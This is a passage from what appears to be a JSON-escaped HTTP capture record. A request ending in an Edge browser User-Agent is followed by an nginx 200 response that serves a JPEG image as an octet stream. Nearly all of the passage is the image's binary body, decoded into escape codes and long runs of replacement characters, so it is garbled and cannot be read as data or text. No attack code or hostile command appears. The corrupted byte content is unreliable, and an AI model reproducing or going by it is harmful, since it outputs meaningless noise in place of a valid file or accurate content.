Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.50\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 4428\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:42:12 GMT\\r\\nEtag: \\\"4dca64a1-114c\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u0010JFIF\\u0000\\u0001\\u0001\\u0000\\u0000\\u0001\\u0000\\u0001\\u0000\\u0000\\ufffd\\ufffd\\u0000C\\u0000\\u0006\\u0004\\u0005\\u0006\\u0005\\u0004\\u0006\\u0006\\u0005\\u0006\\u0007\\u0007\\u0006\\u0008\\n\\u0010\\n\\n\\t\\t\\n\\u0014\\u000e\\u000f\\u000c\\u0010\\u0017\\u0014\\u0018\\u0018\\u0017\\u0014\\u0016\\u0016\\u001a\\u001d%\\u001f\\u001a\\u001b#\\u001c\\u0016\\u0016 , #\\u0026')*)\\u0019\\u001f-0-(0%()(\\ufffd\\ufffd\\u0000C\\u0001\\u0007\\u0007\\u0007\\n\\u0008\\n\\u0013\\n\\n\\u0013(\\u001a\\u0016\\u001a((((((((((((((((((((((((((((((((((((((((((((((((((\\ufffd\\ufffd\\u0000\\u0011\\u0008\\u0000d\\u0000\\ufffd\\u0003\\u0001\\\"\\u0000\\u0002\\u0011\\u0001\\u0003\\u0011\\u0001\\ufffd\\ufffd\\u0000\\u001b\\u0000\\u0000\\u0002\\u0003\\u0001\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0004\\u0002\\u0003\\u0005\\u0001\\u0007\\u0006\\ufffd\\ufffd\\u00002\\u0010\\u0000\\u0002\\u0002\\u0001\\u0003\\u0003\\u0002\\u0004\\u0006\\u0002\\u0002\\u0003\\u0001\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0011\\u0000\\u0004\\u0012!1AQ\\u0013\\\"\\u00052aq\\u0006\\u0014#B\\ufffd\\ufffd\\ufffd\\ufffdR\\ufffd\\u0015b\\ufffdr\\ufffd\\ufffd\\u0000\\u001b\\u0001\\u0000\\u0001\\u0005\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0002\\u0000\\u0001\\u0003\\u0004\\u0005\\u0006\\u0007\\ufffd\\ufffd\\u0000/\\u0011\\u0000\\u0001\\u0003\\u0002\\u0005\\u0001\\u0007\\u0004\\u0002\\u0003\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0000\\u0002\\u0003\\u0004\\u0011\\u0005\\u0012!1A\\u0013Qaq\\ufffd\\ufffd\\ufffd\\ufffd\\\"\\ufffd\\ufffd\\ufffd\\u0006\\ufffd\\u00142\\ufffd\\ufffd\\ufffd\\u0000\\u000c\\u0003\\u0001\\u0000\\u0002\\u0011\\u0003\\u0011\\u0000?\\u0000\\ufffd\\u001a\\ufffdd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd0\\ufffdV\\u0015\\ufffd\\ufffdgQ\\ufffd%XmƲ \\ufffd\\ufffdTg6\\ufffdru\\ufffdƲ0\\ufffd\\ufffdG\\n\\u003e2y\\ufffd\\ufffdd\\ufffdEV\\u0019m}3\\ufffd1\\ufffd\\ufffd\\u003c*\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdqY\\u0016`\\ufffd\\ufffdd\\ufffd\\ufffd6\\ufffdk\\\"\\ufffdw\\ufffd\\ufffdr\\ufffd{0\\ufffdqY.\\ufffd\\ufffd\\u0019*\\u003e3\\ufffd\\ufffdF\\u001e\\u0013u\\ufffd\\u000c\\ufffd\\u000f\\u0018\\ufffdDu2i\\ufffd\\ufffdh.\\ufffdH\\ufffd2\\ufffd\\ufffd\\t\\u0019^Ӗ\\ufffd.z*\\ufffdJ\\ufffd\\ufffd\\u001d\\u0014\\u0002\\ufffd@2ء\\u0012\\t\\u0018=\\ufffd+\\u0012T\\u00176.\\ufffd-\\ufffd\\ufffdEcZA\\u0012,\\ufffd*\\ufffd!\\t\\u0003o\\u0007\\ufffd:\\ufffd\\u003c\\ufffd\\ufffdx\\ufffd\\ufffd\\ufffd\\ufffdFh\\ufffdu\\ufffd'\\u000b\\u00086\\u0001\\u0026\\ufffd\\u0003\\ufffd\\ufffd\\u000c4\\r\\ufffd|\\ufffdӼ\\ufffd@\\u0005\\ufffd\\ufffd\\u003e[$LL\\r2Ѡ\\ufffd\\ufffd\\ufffd\\u0000\\u0019ƈ\\ufffd\\ufffd\\ufffdӅ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0007\\ufffd=N\\ufffd\\ufffd2\\u003ct\\ufffdR\\ufffd*Xr\\ufffdr\\ufffd\\u001d8?+\\u000b\\ufffd#2H\\ufffd\\ufffd1\\ufffd\\u0012D\\ufffdሠ\\u0006\\ufffd6\\ufffd9\\u0006\\ufffdo\\ufffd}\\ufffd\\u0001`ֻV\\ufffdV\\u000c\\ufffd\\ufffd\\ufffd./c\\ufffdY\\ufffdp\\ufffd\\ufffd4\\ufffdz\\u000fH\\ufffd\\u0011V\\n\\ufffd\\ufffd\\u001b\\ufffd\\ufffdu\\ufffd\\u0012)X\\u0005\\ufffdn\\ufffd\\ufffd:\\ufffd\\ufffdaU\\u0004\\ufffd\\ufffd\\r?\\ufffd?\\ufffd\\u0008\\ufffd\\rm^\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\r}\\ufffd\\ufffd\\nF\\ufffd\\u0019\\ufffd\\ufffdI\\u0004J\\ufffd\\u0015:\\ufffd\\u0003\\ufffdd\\ufffd?\\ufffd\\ufffdSϬ\\ufffd\\ufffd$!\\ufffdj\\u0004\\ufffd6\\ufffd_\\ufffd_\\u001fk\\ufffd\\r\\u0000\\\\\\ufffd\\ufffdUM4\\ufffd(\\u0008\\u0016\\u0017$\\ufffd\\ufffd\\ufffd\\ufffdt\\ufffd\\ufffd\\ufffdx$\\u000e\\u0019\\u0003q\\ufffd#ʚ\\ufffd\\u003e\\ufffd+\\u001a9\\ufffd3\\ufffd;V\\ufffd\\ufffd8\\ufffd\\ufffdc\\ufffd\\ufffdLz\\u0007Ӽ\\ufffd6\\ufffd53\\ufffd\\u0012\\ufffdeZ8\\t4\\u0018\\ufffd\\ufffd\\ufffdJ\\ufffd\\u001c\\u000e\\ufffd\\ufffd4\\ufffd@\\ufffd\\ufffdM\\ufffd\\ufffd1\\ufffd\\ufffd\\ufffd\\u0005EF\\ufffdr9*H\\ufffd(qV\\u000b\\ufffd\\ufffd\\ufffd,\\ufffdq\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdm\\ufffd\\ufffd%\\ufffd \\ufffd\\u0006\\ufffdB\\ufffdp\\ufffd\\u0004\\ufffd1b\\u0010\\ufffd\\ufffdj9$\\ufffd}?\\ufffd\\ufffd\\ufffd,[M\\ufffd\\ufffd\\ufffd\\u0001\\u001b\\ufffdkQ\\u001dױ\\ufffd`\\ufffd+l\\ufffdiqf\\ufffd\\ufffd\\ufffd\\ufffdWw\\ufffd%+\\u0018\\ufffd\\ufffd\\ufffd]\\ufffd\\ufffd\\ufffd$\\ufffdp/8󿡣\\ufffd@\\ufffd\\ufffd\\ufffdr\\ufffdE\\ufffdk\\u001d\\ufffd6\\u003c\\ufffd\\u0008\\ufffd\\ufffdc\\u0006\\ufffdIYX\\ufffd\\ufffd\\ufffd/\\ufffdq\\ufffd\\ufffdR:\\u0018\\ufffd5\\n^%e\\u001eǐ\\ufffd\\u0007\\ufffd\\ufffdU}\\ufffd\\ufffd\\u003c\\ufffd\\ufffd\\u0026\\ufffd\\ufffdR\\ufffd\\ufffd)\\u0000\\u0012H\\ufffd\\ufffd\\u0000\\r\\ufffd\\ufffd\\ufffd\\u003c\\ufffd9\\ufffd\\u0026\\ufffdW\\ufffdI6\\ufffd?a?9\\ufffd\\ufffd\\ufffd!\\ufffduR\\ufffd\\u0000\\ufffd51\\u003e\\ufffd\\u000e\\ufffd\\ufffd\\u001e\\u001dDl-8;ā\\ufffd\\ufffd\\ufffd\\ufffd\\u00006\\u000f?B\\u0000\\u001b\\\\n\\ufffdjꧠ\\ufffd\\ufffdq~c\\ufffd\\ufffdi\\ufffd\\ufffd\\ufffd\\ufffd$SH\\ufffd\\u00132L\\ufffd@\\ufffdW\\ufffd*ё\\ufffdf\\ufffdz\\ufffd\\ufffd\\u0000+\\ufffd\\ufffdm9\\ufffd\\ufffd\\ufffd\\u0014\\ufffdb*\\ufffd\\ufffdV\\ufffdZ4o\\ufffd\\ufffd\\ufffdV\\ufffd\\ufffd\\u001a\\ufffdٷJʭ\\ufffdH\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u000ex\\ufffd\\ufffd\\u001b\\ufffd(\\ufffd\\ufffd%\\ufffd;+\\ufffd\\ufffdU0\\ufffd\\ufffdXKo\\ufffd\\ufffd\\ufffdhi\\ufffd\\r4~\\ufffd\\ufffd~`\\ufffd\\ufffd(b»\\ufffdz׎\\ufffd\\ufffd\\ufffd\\ufffdh@`\\ufffd\\ufffd\\ufffd6\\ufffdeGݶ\\ufffd\\u0000\\ufffdV\\u0008\\ufffd\\u0005\\ufffdʦ\\ufffd\\ufffd\\ufffd6\\ufffd\\ufffd\\ufffd\\r\\ufffd;\\ufffd\\u001d\\t\\ufffd\\u0000@\\ufffd\\ufffds\\ufffdC\\u0014r\\ufffdR3\\u001f\\ufffd\\ufffd2\\t\\u0014i\\ufffd\\ufffd\\ufffdTG\\ufffd:\\u0010\\u0008\\ufffd\\ufffd\\ufffdB\\ufffd'\\ufffd(\\\\e\\ufffdp\\ufffd |\\ufffdR\\ufffd.\\ufffd\\u000b\\ufffd\\ufffd\\ufffdt\\u0005\\ufffd\\ufffd\\u0002C\\ufffd\\ufffd7\\u0016\\ufffd\\ufffd\\ufffd\\\"\\ufffd\\ufffd\\ufffd\\ufffd8\\ufffd\\u0007M\\ufffdE$,\\ufffd\\u0026\\u0014\\u000e\\ufffd\\u003c\\ufffd\\u0007\\ufffd\\ufffd\\u001d\\t\\ufffd4\\ufffdJҼ\\ufffd~\\ufffd\\ufffd9jC,d\\ufffdف\\u001c\\u0001\\ufffd;\\ufffd\\u0000]\\ufffd\\u0007kZ߇\\ufffd\\ufffdP\\ufffd\\ufffd\\u0015\\ufffd2\\ufffd(k\\ufffd\\ufffd/\\ufffd\\u0011\\ufffdM\\ufffd\\ufffd\\ufffd:\\ufffdd\\ufffdN\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd林ԝ\\ufffdCpX\\ufffd\\ufffd8\\ufffd/\\ufffd\\u0016\\u003c\\ufffd\\u001c\\ufffd8\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd'\\ufffdkkb\\ufffdu\\u0011G/\\ufffd^O\\ufffdT\\u0014x\\ufffd}Gׯ\\ufffdŠ\\ufffdsJ\\u0015\\ufffde\\n\\ufffdw\\ufffdZW\\u0000\\ufffd\\r\\u001e/\\ufffdW{]{\\u0005\\ufffd\\ufffdUQ22]a}{\\ufffd\\u003e]OK\\ufffd\\ufffdF\\ufffd*D\\u0026\\ufffd7;\\ufffd\\ufffd{\\ufffd\\ufffdQ\\u0010\\ufffd\\ufffd\\ufffdC\\ufffdP\\ufffdG\\ufffd\\ufffd\\ufffd\\ufffdv(\\u0001\\ufffd\\ufffdO8\\ufffdZWi\\ufffd\\ufffd\\u0001i#4֥A\\ufffdш\\ufffd\\ufffdsW]\\ufffd\\ufffd\\u0013$\\ufffd4N\\u001fiV\\ufffdn\\ufffd\\u0006\\u001c\\ufffd\\ufffd\\u0010~\\ufffd\\ufffd9#\\u0001:\\u0015F\\ufffdH\\u0003\\ufffd\\ufffd\\ufffd\\u0001\\ufffd\\ufffdS\\ufffd\\ufffd\\ufffd\\\"\\ufffd\\ufffdA%\\ufffd\\ufffdx\\ufffd\\ufffd\\u000fw5\\ufffd\\ufffd\\ufffd\\u0003*\\ufffd\\u0003\\u0016\\ufffdIY\\ufffdHY\\u001byqE@\\ufffd\\ufffd5\\ufffd\\ufffdo\\ufffd۾\\ufffd\\ufffd\\u0012(U_dP\\ufffdV4-)$\\ufffdJ,\\ufffdl\\ufffd\\\"\\ufffd\\ufffdךˌ\\r,pƞ\\ufffds\\ufffd\\ufffd\\ufffd\\u00197B\\ufffd\\ufffd-\\ufffdC\\ufffdm\\ufffd\\ufffd\\u000f\\u0016\\r\\ufffd\\ufffdB\\ufffdf\\ufffd\\u001b\\u0014\\ufffd\\ufffd\\ufffd\\ufffd\\u001fE\\ufffdڄ\\ufffd\\ufffd\\ufffd\\ufffd18\\ufffd\\ufffd\\u001d\\ufffd\\ufffdUoU\\ufffd\\ufffd\\\"\\ufffdоؤӳ0\\u0006\\ufffdp3cT\\ufffd\\ufffd\\ufffd\\ufffd#\\ufffd5\\r$6x\\ufffd\\u0010z\\ufffd\\u0026ʶ\\ufffdTh\\u001a#\\ufffdV-\\u0002j\\u0002\\u0015\\u0005\\t\\ufffd\\ufffd\\t\\u0014M_#\\ufffd\\u001b\\u0000\\ufffd\\u0005\\u001e/+\\ufffdóJ\\ufffd\\ufffd\\ufffdF\\ufffd\\ufffd\\ufffd%\\ufffdK\\ufffd\\ufffdR\\ufffdF\\ufffd*\\ufffd2\\ufffd\\ufffd\\ufffd\\ufffd~\\ufffd\\ufffdhi\\ufffd%d\\ufffd4\\ufffdEz\\ufffd\\u0015BG\\ufffd\\u0006\\ufffd5`t\\ufffd\\u0003\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd*\\ufffd\\u0000\\ufffdI\\ufffd\\u000eù\\ufffd9\\u003ce\\ufffd\\ufffd@\\ufffd\\ufffd\\ufffd\\ufffdxԊfQVv\\ufffd@\\ufffd]\\ufffd\\ufffdxÂ\\ufffd\\ufffdzI\\ufffd\\ufffdc\\ufffd\\u0005u\\ufffdA#*:\\ufffdB\\u0003Q\\ufffdM\\u0003G\\ufffdDgSB\\ufffd\\ufffd\\ufffdޑ3\\ufffd\\ufffd\\ufffd\\ufffdZ\\ufffd\\ufffd\\u0001\\ufffdy\\u0000\\u0001\\ufffdt錬\\n\\ufffd$\\ufffd\\ufffd]\\u0001\\u0004\\ufffdˎ\\ufffdx\\ufffd\\t\\ufffd\\ufffdY\\ufffd\\u0002\\ufffd\\ufffd:d\\u001a\\ufffdA\\u0010\\ufffdf\\ufffd\\u001c\\ufffd-\\ufffd{\\ufffd-tv݁\\ufffd\\ufffd\\ufffdV2\\ufffd.W5Y\\ufffd\\u0018\\u000bKέ\\ufffd\\ufffd,yt蓕\\ufffdU\\ufffd\\ufffdfP\\ufffd[\\u0000o\\ufffd]\\u0001aۥu'\\u0011\\u0012)\\ufffd\\ufffd+\\u0017ݹ\\u001c8*\\u0008,\\u0008\\ufffd{w\\u0007\\ufffd\\ufffd\\ufffdI\\ufffd]\\u0013Țy\\ufffd\\u0012eYD\\ufffdC!dV\\u001e\\ufffd\\t5\\ufffdA\\ufffd\\u0002\\ufffd\\ufffd\\u000eT\\ufffdB}k\\ufffd\\ufffd1\\ufffd2\\ufffdK\\u001f\\u0014\\ufffd\\ufffd.k\\\\30\\ufffd\\ufffdF.ڗ\\u0008ݭ\\ufffd}\\ufffdj\\ufffd,o\\ufffd[\\u0013\\u001b\\u001c\\ufffd\\u001a\\ufffd\\u003cQʂ\\ufffdov]\\ufffd`\\ufffdn\\ufffd\\ufffd\\u0012mH\\ufffd\\ufffd^\\ufffd古T\\ufffd|r\\ufffd\\ufffd]\\ufffd\\u0002O\\u0015\\ufffdu'\\ufffd\\u0000\\u001c\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd$\\ufffd\\u00166\\ufffdrgK\\ufffd\\ufffd]\\ufffd\\ufffd\\u0019\\ufffd\\ufffd\\ufffd\\ufffd:\\ufffd\\n_;\\ufffd\\u0000\\ufffd\\u0000}\\ufffd\\r\\ufffdj\\u0010\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdsn\\ufffdN\\ufffd]\\ufffd\\ufffd뷋\\ufffd\\ufffdL\\ufffdL\\ufffdE\\u0014Q\\ufffdWolq\\ufffdv\\u0002\\ufffd/h#ڶ;\\ufffd\\ufffdrT\\u001b\\ufffd\\ufffd\\ufffd\\ufffd1X\\ufffd{I{@\\ufffd\\ufffdd\\ufffd\\ufffdd\\ufffd\\u000fóG\\ufffdD\\ufffdj\\ufffd(Ν\\ufffd\\ufffd\\tm\\u001f1a@\\ufffd\\ufffdr7X\\r^E\\ufffd@\\ufffdt\\ufffd!\\ufffdU\\ufffd+\\u001bI\\ufffd\\ufffdGP\\u0019\\ufffd\\nwn\\ufffd\\ufffd\\u0010\\u000f\\u001b\\ufffdb\\u000fZ 篡\\ufffdӟO\\u003c\\ufffd\\ufffd\\ufffdbd(\\ufffd\\ufffd\\ufffd\\ufffdi\\ufffdn\\ufffd\\ufffdo\\u001b\\ufffd\\ufffd\\ufffdq\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd7z\\u0016#\\ufffdU\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\\ufffdfe^\\u001a\\ufffd\\ufffd\\ufffd.kYrQ\\ufffd4E\\ufffd5\\ufffd\\ufffd\\ufffd\\ufffdd\\ufffd\\ufffd\\u001c\\u0002NԠ\\ufffd\\u0010\\ufffd\\ufffd$w\\ufffd\\ufffdO\\ufffd0$\\u0012\\ufffd\\ufffdx\\ufffd\\ufffd\\ufffdL\\ufffd\\ufffd\\ufffd\\u0004\\ufffd\\ufffd.\\ufffdlR\\ufffdc\\ufffdH5\\ufffd\\ufffd\\ufffdŬ1\\ufffd\\ufffdY\\n\\ufffd\\u0006\\ufffd\\\\\\u0005\\u0003\\ufffd_\\u003c\\ufffdn\\ufffd՞2\\ufffd\\ufffd'u\\ufffd84s\\ufffdB\\u001a\\ufffd\\ufffdi\\ufffd\\ufffdJ\\u0002\\ufffd*\\ufffdGI1\\ufffda\\u0011\\ufffd6\\ufffdT\\ufffd\\ufffd\\u000b*\\ufffd\\u000bW\\ufffd\\u001f\\ufffd~\\ufffd\\ufffd\\ufffdP`\\ufffd\\ufffdP\\ufffd\\ufffdۻ1w\\ufffd\\ufffdfbI\\ufffd9\\ufffd\\u0000\\ufffd\\ufffdh\\ufffd\\ufffd\\u0008\\ufffd\\ufffd\\ufffd\\ufffd\\u0015QI\\u0026\\ufffd\\u0001G=z\\u0000\\u003c\\ufffd\\ufffd\\u0015_\\u0012\\ufffdi\\u0001/c@\\ufffd\\ufffdZS\\ufffdH\\ufffd\\ufffdb\\u0012\\ufffd\\ufffd\\u0018\\ufffdK\\ufffd`R9w,G\\u0000\\u0002\\r_S\\ufffd\\ufffd\\ufffdK\\ufffdַZ\\ufffd\\u0000\\ufffd~!9\\ufffd4\\ufffd\\ufffd5Dc܇jPF\\u001cݐ\\ufffdl}\\ufffd{4\\ufffd\\ufffd\\ufffd锉\\ufffd\\ufffd*fm\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd׻h\\u0015f\\ufffd\\ufffd\\u0019{z!\\ufffd\\ufffd\\u001d8W`_\\ufffd\\ufffd\\ufffd\\u0005\\ufffdW`C\\ufffd\\ufffdo\\ufffd=M\\ufffd\\u000cG\\u000fu`\\u0001\\ufffd\\ufffd\\ufffd\\u0010\\u0019%\\u003c\\ufffd\\ufffdfk\\ufffd\\ufffd\\ufffd\\ufffdI/\\ufffd4_\\u0001\\ufffd/\\ufffdf_\\ufffd,(\\ufffdHǫРM\\ufffd=\\u0005\\ufffd?z\\ufffdmY;\\ufffd\\ufffd\\ufffd\\ufffd\\t\\nzu\\ufffd\\ufffd篃]\\u000em|GYꬔ\\ufffdB\\ufffd%MY\\u0000՟\\u0000\\ufffd\\u0017]\\u003c\\ufffdkkUQ\\u0015\\ufffd\\ufffd\\ufffdV76\\ufffdD\\ufffd\\u0000\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u000c\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd/\\ufffdp\\ufffdM\\u0010!\\ufffd\\ufffd\\ufffd\\ufffdo\\ufffd\\ufffdJ\\ufffd[\\ufffd;\\u001b\\u0004_RB\\ufffd#\\u0005\\ufffd\\ufffd@\\ufffd\\ufffd \\ufffd=8$_\\ufffdp\\ufffdY\\nV\\ufffd2\\u0016\\ufffd%\\ufffd\\ufffd\\u0007\\ufffd\\ufffdyѨgӘ\\r\\u0018\\ufffd=7W\\ufffd\\ufffd\\u001f\\ufffd\\u0016\\ufffd|\\u001b=1\\ufffd\\ufffdb\\ufffd+\\ufffd\\u003c\\ufffd\\ufffd \\u003cO\\ufffdj\\ufffd\\u0003V玎\\ufffd+~\\ufffdQ\\ufffd\\ufffd\\ufffd\\ufffdx\\ufffd\\ufffd\\ufffd\\u001d\\ufffd\\ufffd?\\u0010O,_\\ufffd\\ufffd'\\ufffd\\ufffdC\\u001bN\\ufffdb\\ufffd\\u003c\\ufffdn\\n\\u0018\\u0000\\ufffd\\ufffdn\\ufffd\\ufffd\\u0018\\ufffd\\u0015d_\\u0000\\ufffd\\ufffdN\\u0011\\ufffd\\ufffd;\\ufffd\\u000cȼ\\ufffd\\ufffd\\ufffd͑\\ufffd\\ufffd{4\\ufffdtq\\ufffd:HF\\ufffdI57\\\"\\ufffd\\u000c\\ufffd\\u0013a\\ufffdF\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdB\\ufffd\\ufffd'$\\ufffd\\ufffd\\ufffd\\u0019cy^\\ufffd\\ufffd8\\ufffd\\ufffd\\ufffd\\u001e6\\ufffd^E\\ufffd\\u000e_\\ufffd\\ufffd\\ufffd\\ufffdru\\ufffd\\ufffdLa\\ufffd\\ufffd\\u0019\\ufffd6\\ufffd\\r\\u0005t$\\u0017b\\ufffd\\u0016\\ufffdkn9\\ufffdU\\ufffd\\ufffd\\ufffd?\\ufffdU\\ufffdm\\ufffd\\u0015\\ufffd\\ufffdO5|\\ufffdz#\\ufffd\\ufffd;.\\ufffd\\ufffdԚ\\ufffdi*\\ufffd\\ufffd\\ufffdv\\ufffdb\\u0005\\ufffd ]mcԟq\\ufffd\\u0000\\ufffd\\u000c\\ufffdl\\ufffd\\ufffd\\t%E\\ufffd\\u0000\\u001c\\ufffd'?\\ufffd\\ufffdO\\u0007\\ufffd'\\ufffd\\ufffd)\\ufffdњ8\\ufffd\\u000b\\ufffdu\\u0006\\ufffdY\\ufffd\\ufffd\\ufffdnQ\\ufffdߥ\\ufffd9\\ufffd\\ufffd\\u0002\\r\\n\\ufffd\\ufffdW\\u0015\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdi\\ufffdu\\ufffdqFY\\ufffd)U\\ufffdn\\ufffd\\ufffd\\u0002\\ufffd\\ufffdӽ\\u000b$\\ufffd,~f#(t\\ufffd\\ufffd87\\ufffd\\ufffd\\ufffdG\\u003e*\\ufffd}z\\ufffd\\ufffd/{\\ufffd@5S\\ufffd\\ufffdz\\u0016\\ufffd\\n\\ufffd!f\\ufffdH\\ufffd\\u0019\\u0002m\\u000c\\ufffd6\\ufffd\\ufffdn\\ufffd\\u001b`\\u0005\\ufffdNVȻ\\u0013\\ufffd9\\u0004\\ufffd\\ufffd]\\ufffd\\ufffd\\ufffd\\ufffd7W\\ufffd\\u0000,\\ufffd,\\ufffd\\ufffd_zG\\u000cP@\\ufffd!\\ufffd\\u0004h\\ufffd\\ufffd\\n\\u0005\\u0001}\\ufffd;\\ufffdp\\ufffd,\\ufffd\\ufffdd\\ufffd\\ufffdZ\\ufffdO\\u0003\\ufffdj\\u003c\\ufffdt\\ufffd\\u0008\\ufffd\\u0000A2\\u001a\\ufffd\\u0013|u\\ufffd+\\ufffd\\ufffd*\\ufffdS\\ufffdԐ\\u0011\\ufffd3\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdh\\ufffd\\ufffd?A\\ufffdV2\\t\\ufffd,\\ufffd\\u0015\\ufffd\\ufffd*\\ufffd\\ufffd\\ufffdA\\ufffdZy\\ufffd\\ufffd\\ufffd\\ufffdd'k*\\ufffd-\\ufffdM\\ufffd\\ufffd\\ufffd\\ufffdn\\ufffd\\u0007\\ufffd\\ufffd\\u0016E\\ufffdS\\u0011C\\u000b\\ufffd%\\ufffd\\ufffd\\ufffd_\\ufffd}\\ufffd50j\\u0016#\\ufffdi\\ufffdƀ\\ufffd\\ufffd\\ufffdW\\ufffdU\\ufffd\\ufffdj\\ufffdy\\ufffd1\\u000b\\u0006\\ufffd\\ufffd\\u0013\\ufffd\\ufffd$\\ufffd\\ufffd2Q\\ufffduA\\ufffd\\ufffdP\\ufffd\\ufffdI\\ufffd2\\u0000i=\\ufffd\\u001b\\ufffd\\ufffd\\rq\\ufffdh\\ufffdP+\\ufffd\\t\\ufffd\\ufffd$\\ufffd\\ufffd\\r$\\ufffd\\ufffd\\ufffdx\\ufffd`\\ufffd\\ufffd\\u0001\\u0007\\ufffd\\u0004U\\ufffd\\ufffd\\ufffd\\ufffdp\\u0004E\\ufffdԄt8\\ufffdDl!\\ufffd\\ufffd\\ufffd\\ufffd\\u000e\\ufffd\\ufffd\\u0016\\ufffd\\ufffd\\ufffd%\\ufffdj\\u0026\\ufffd\\u001eÓҸ\\u001c\\ufffd\\u0005\\ufffd\\ufffduh\\ufffdeT\\u0008y\\ufffd\\ufffdہ\\u0016v\\ufffd\\ufffd]\\ufffd\\ufffd;\\ufffd\\ufffd\\ufffdk\\ufffd^\\ufffd\\ufffd/#6\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdl\\ufffd\\u0008\\u0015`\\u0002\\u0000\\ufffdx\\u0007\\ufffd8\\ufffd{\\u003c\\ufffd\\u0007\\u0006\\ufffd\\u0015\\ufffd\\ufffd\\ufffdZD\\ufffd\\u0002Á\\ufffdZ\\ufffdYv\\ufffd3X\\ufffdx\\ufffd]\\ufffd\\u000b9:v\\ufffd\\ufffd\\ufffd\\ufffd\\u001c\\u001fo\\ufffd\\ufffd*\\ufffdt\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdl'\\ufffd\\ufffd\\ufffd\\u0015d\\ufffd)\\ufffdXC\\ufffd\\ufffd\\ufffd\\ufffdA?\\ufffd[\\ufffd;\\u001e0̆\\ufffd\\u0006\\ufffd\\ufffd\\ufffd{$\\ufffd:\\u0011~E\\ufffd\\u001eˌE_\\ufffd:\\ufffdcd\\ufffd6\\ufffd\\ufffd\\ufffd\\ufffd@\\t x\\u001f\\ufffdZX\\ufffd0\\ufffd\\ufffd\\ufffdr\\u0008\\ufffd\\u000b\\u0026\\ufffdX5q\\ufffd\\ufffdW\\ufffd\\ufffd\\u00114!Ķ(\\u000b\\ufffdP\\ufffd\\u0015\\ufffd\\u0000!`\\ufffd\\u000cQP\\ufffd\\ufffd\\u0016]\\ufffd\\ufffd\\ufffdS@(n\\ufffd\\u0015\\u003c\\ufffd?sB\\ufffdh\\ufffd\\ufffd\\ufffd\\ufffd=\\u001e,\\ufffd\\u0026\\ufffd63\\ufffd\\ufffd׿mO\\ufffdȅ\\t \\u0000I\\ufffdC\\u001c\\ufffd\\ufffd\\u0010\\ufffdɽ\\ufffdŀ꠆\\ufffdu\\u0004\\u001a\\ufffd#\\ufffd\\ufffd|\\ufffd`j\\ufffd\\ufffdT\\ufffd\\u0014h\\ufffd1=\\ufffd\\u0004W ݃\\ufffd\\u0026󷦱\\ufffdfU\\u0014\\u000b\\ufffd\\ufffd#\\ufffdO'\\ufffd\\ufffd\\u0000F\\ufffd\\u003ey\\ufffd\\u0013\\ufffd1\\ufffd\\ufffd\\ufffd|\\ufffd\\u0026U\\u0004\\ufffd`,{\\ufffd\\n8\\u0000\\ufffdg\\ufffd$\\ufffd\\ufffd\\ufffdN\\ufffd!sjň\\u00062\\ufffd]\\u001b\\ufffd\\ufffd\\ufffd\\ufffd\\u0000Uu\\ufffds\\ufffd\\ufffd\\ufffd\\ufffds\\ufffd`t%\\ufffdT\\ufffd\\u001bzr\\ufffd\\ufffd\\ufffd\\u001bd$h\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0026\\ufffd鿱Q\\ufffd\\ufffdZ2\\ufffd\\ufffdJ\\ufffdE3\\ufffd\\u0000.\\ufffd\\ufffd#\\ufffd\\ufffd\\ufffd\\njd3\\u0015\\ufffdL\\ufffd\\ufffdR\\ufffdE\\ufffd\\ufffdd\\ufffd\\u001cw\\u003cp:_$N҅\\ufffdNc\\u0006\\ufffd\\ufffd\\nO\\ufffd\\ufffd\\ufffdT\\ufffd5\\u0008\\ufffdG#iF\\ufffd\\u0011?.\\ufffd\\ufffd\\ufffd\\ufffd@\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdY\\ufffdy\\u001c\\ufffd̞h*gf\\u0014\\ufffd3-\\ufffdN\\ufffd\\ufffd#B;\\ufffd\\ufffdz\\ufffd\\ufffd\\ufffdb\\u00074t\\ufffdE\\ufffdP\\ufffdʦ3 